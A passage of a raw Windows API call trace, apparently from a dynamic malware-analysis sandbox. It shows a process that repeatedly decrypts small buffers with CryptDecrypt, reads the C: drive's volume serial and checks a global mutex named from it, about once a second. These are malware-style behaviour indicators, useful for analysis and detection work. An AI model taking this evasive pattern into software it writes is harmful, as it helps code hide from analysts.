hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0204.762] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0204.762] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0204.762] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0204.762] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.762] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0204.762] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0204.762] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0204.762] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0204.762] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0204.762] CryptDestroyKey (hKey=0x29c020) returned 1 [0204.762] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0204.762] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0204.762] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0204.762] CloseHandle (hObject=0x1c0) returned 1 [0204.762] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0204.762] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0204.762] Sleep (dwMilliseconds=0x3e8) [0205.775] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0205.775] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0205.775] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0205.775] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0205.775] CryptDestroyKey (hKey=0x29c020) returned 1 [0205.775] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0205.776] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0205.776] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0205.776] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0205.776] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0205.776] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0205.776] CryptDestroyKey (hKey=0x29c020) returned 1 [0205.776] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0205.776] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0205.776] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0205.776] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0205.776] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0205.776] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0205.776] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0205.776] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0205.776] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0205.776] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0205.776] CryptDestroyKey (hKey=0x29c020) returned 1 [0205.776] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0205.776] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0205.776] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0205.776] CloseHandle (hObject=0x1c0) returned 1 [0205.776] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0205.776] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0205.777] Sleep (dwMilliseconds=0x3e8) [0206.787] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0206.787] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0206.788] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0206.788] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0206.788] CryptDestroyKey (hKey=0x29c020) returned 1 [0206.788] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0206.788] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0206.788] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0206.788] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0206.788] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0206.788] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0206.788] CryptDestroyKey (hKey=0x29c020) returned 1 [0206.788] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0206.788] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0206.788] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0206.788] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0206.788] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0206.788] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0206.788] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0206.788] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0206.788] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0206.788] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0206.788] CryptDestroyKey (hKey=0x29c020) returned 1 [0206.788] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0206.788] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0206.788] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0206.789] CloseHandle (hObject=0x1c0) returned 1 [0206.789] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0206.789] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0206.789] Sleep (dwMilliseconds=0x3e8) [0207.802] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0207.802] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0207.802] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0207.802] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0207.802] CryptDestroyKey (hKey=0x29c020) returned 1 [0207.802] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0207.802] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0207.802] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0207.802] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0207.803] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0207.803] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0207.803] CryptDestroyKey (hKey=0x29c020) returned 1 [0207.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0207.803] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0207.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0207.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0207.803] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0207.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0207.803] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0207.803] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0207.803] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0207.803] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0207.803] CryptDestroyKey (hKey=0x29c020) returned 1 [0207.803] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0207.803] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0207.803] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0207.803] CloseHandle (hObject=0x1c0) returned 1 [0207.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0207.803] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0207.803] Sleep (dwMilliseconds=0x3e8) [0209.392] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0209.392] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0209.392] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0209.392] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0209.392] CryptDestroyKey (hKey=0x29c020) returned 1 [0209.392] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0209.392] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0209.392] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0209.392] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0209.392] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0209.392] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0209.392] CryptDestroyKey (hKey=0x29c020) returned 1 [0209.392] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0209.393] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0209.393] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0209.393] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0209.393] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0209.393] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0209.393] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0209.393] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0209.393] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0209.393] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0209.393] CryptDestroyKey (hKey=0x29c020) returned 1 [0209.393] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0209.393] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0209.393] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0209.393] CloseHandle (hObject=0x1c0) returned 1 [0209.393] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0209.393] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0209.393] Sleep (dwMilliseconds=0x3e8) [0211.686] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0211.686] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0211.686] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0211.686] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0211.686] CryptDestroyKey (hKey=0x29c020) returned 1 [0211.686] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0211.686] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0211.686] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0211.686] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0211.686] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0211.686] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0211.686] CryptDestroyKey (hKey=0x29c020) returned 1 [0211.686] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0211.686] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0211.686] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0211.686] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0211.686] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0211.686] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0211.686] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0211.686] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0211.686] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0211.686] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0211.686] CryptDestroyKey (hKey=0x29c020) returned 1 [0211.686] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0211.686] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0211.686] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0211.686] CloseHandle (hObject=0x1c0) returned 1 [0211.686] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0211.687] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0211.687] Sleep (dwMilliseconds=0x3e8) [0213.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0213.019] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0213.019] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0213.019] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0213.019] CryptDestroyKey (hKey=0x29c020) returned 1 [0213.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0213.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0213.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0213.019] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0213.019] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0213.019] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0213.019] CryptDestroyKey (hKey=0x29c020) returned 1 [0213.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0213.019] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0213.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0213.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0213.019] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0213.019] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0213.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0213.019] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0213.019] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0213.019] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0213.019] CryptDestroyKey (hKey=0x29c020) returned 1 [0213.019] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0213.020] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0213.020] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0213.020] CloseHandle (hObject=0x1c0) returned 1 [0213.020] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0213.020] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0213.020] Sleep (dwMilliseconds=0x3e8) [0214.226] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0214.226] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0214.226] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0214.226] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0214.226] CryptDestroyKey (hKey=0x29c020) returned 1 [0214.226] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0214.226] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0214.226] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0214.226] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 